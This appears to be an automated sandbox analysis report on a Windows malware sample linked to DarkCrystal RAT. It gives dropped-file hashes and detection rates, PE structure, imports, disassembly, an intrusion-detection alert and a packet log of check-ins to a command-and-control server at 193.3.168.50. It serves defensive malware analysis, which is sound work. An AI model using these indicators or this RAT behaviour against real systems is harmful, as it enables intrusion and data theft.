                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):89600
                                                                                                                  Entropy (8bit):5.905167202474779
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32768
                                                                                                                  Entropy (8bit):5.645950918301459
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):89600
                                                                                                                  Entropy (8bit):5.905167202474779
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):24576
                                                                                                                  Entropy (8bit):5.535426842040921
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                                  MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                                  SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                                  SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                                  SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):55
                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                  Process:C:\Windows\System32\PING.EXE
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):502
                                                                                                                  Entropy (8bit):4.6048426069826895
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:PZ5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:LdUOAokItULVDv
                                                                                                                  MD5:3772C8A6BE7A12366E9B4E96F4489643
                                                                                                                  SHA1:4E93A70C1604E3A378B0A6330BD7C7C4CE7AB6DE
                                                                                                                  SHA-256:815727123D8C135F839CC45D3AB906B47EEAC9FE23AF26CBBB5B931E56F975AA
                                                                                                                  SHA-512:C19DF3B7E1A809E7B7093A8F8C60D7E60DEA489D8F7D614D454E815A16D7F92363B439E380FADBA1CCA0BEEED2915855BF168E79A3D6DE49DF4BE46A29759767
                                                                                                                  Malicious:false
                                                                                                                  Preview:..Pinging 045012 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.505513225724165
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:file.exe
                                                                                                                  File size:2'331'371 bytes
                                                                                                                  MD5:c9059dfb76ad9e011d4e11608ccc98cc
                                                                                                                  SHA1:c7ec739a977cc99a19e39103e2a20d59a6094508
                                                                                                                  SHA256:906e30690506eb761b3f84f7ae1146db9dc796e60d87303173fc99370485c58f
                                                                                                                  SHA512:da494d85e5689c65f2369bcff41479ec9a797322c761e18138c1e2397e0879986dc9bca64d9cdc20999902db90fdec8f94ad36184997d396433ab1a7c2e1b9ce
                                                                                                                  SSDEEP:49152:IBJR1ijXQywiXW604Jjh42gv9Gk2AWDpL5mlP:yr1IZXWCJjhZgHW1N4P
                                                                                                                  TLSH:B2B5C046BAD34E73C1943F7188D7102D82B1DE363536EF8B3A0F6995AC161728A162F3
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                                                                                  Icon Hash:1515d4d4442f2d2d
                                                                                                                  Entrypoint:0x41f530
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                                                  Instruction
                                                                                                                  call 00007F825CC147ABh
                                                                                                                  jmp 00007F825CC140BDh
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                  mov esi, ecx
                                                                                                                  call 00007F825CC06F07h
                                                                                                                  mov dword ptr [esi], 004356D0h
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                  mov eax, ecx
                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                  mov dword ptr [ecx+04h], 004356D8h
                                                                                                                  mov dword ptr [ecx], 004356D0h
                                                                                                                  ret
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  mov esi, ecx
                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [esi], 004356B8h
                                                                                                                  push eax
                                                                                                                  call 00007F825CC1754Fh
                                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                                  pop ecx
                                                                                                                  je 00007F825CC1424Ch
                                                                                                                  push 0000000Ch
                                                                                                                  push esi
                                                                                                                  call 00007F825CC13809h
                                                                                                                  pop ecx
                                                                                                                  pop ecx
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                  call 00007F825CC06E82h
                                                                                                                  push 0043BEF0h
                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                  push eax
                                                                                                                  call 00007F825CC17009h
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                  call 00007F825CC141C8h
                                                                                                                  push 0043C0F4h
                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                  push eax
                                                                                                                  call 00007F825CC16FECh
                                                                                                                  int3
                                                                                                                  jmp 00007F825CC18A87h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push 00422900h
                                                                                                                  push dword ptr fs:[00000000h]
                                                                                                                  Programming Language:
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-05T10:53:17.949836+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49734 | 193.3.168.50 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                  Dec 5, 2024 10:53:26.860915899 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:26.861126900 CET4974880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:26.861212969 CET4975080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:26.980896950 CET8049750193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:26.981057882 CET4975080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:26.981178999 CET4975080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:26.981286049 CET8049746193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:26.981350899 CET4974680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:26.981880903 CET8049748193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:26.982141972 CET4974880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.081751108 CET4975080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.082123995 CET4975180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.101108074 CET8049750193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.201828003 CET8049751193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.201899052 CET4975180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.201997995 CET4975180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.202207088 CET4975280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.245477915 CET8049750193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.321652889 CET8049751193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.321867943 CET8049752193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.322191954 CET4975280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.322307110 CET4975280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.441941977 CET8049752193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.549489975 CET4975180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.669254065 CET8049751193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.669337988 CET8049751193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.674469948 CET4975280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:27.794457912 CET8049752193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.949670076 CET8049750193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:27.949736118 CET4975080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:28.439523935 CET8049751193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:28.562184095 CET8049752193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:28.580650091 CET4975180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:28.611906052 CET4975280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:28.677506924 CET8049751193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:28.733004093 CET4975180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:28.797455072 CET8049752193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:28.846277952 CET4975280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:28.922827959 CET4975180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:28.922965050 CET4975280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:28.923289061 CET4975380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:29.043112993 CET8049753193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:29.043186903 CET4975380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:29.043292046 CET4975380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:29.043445110 CET8049751193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:29.043977022 CET4975180192.168.2.4193.3.168.50
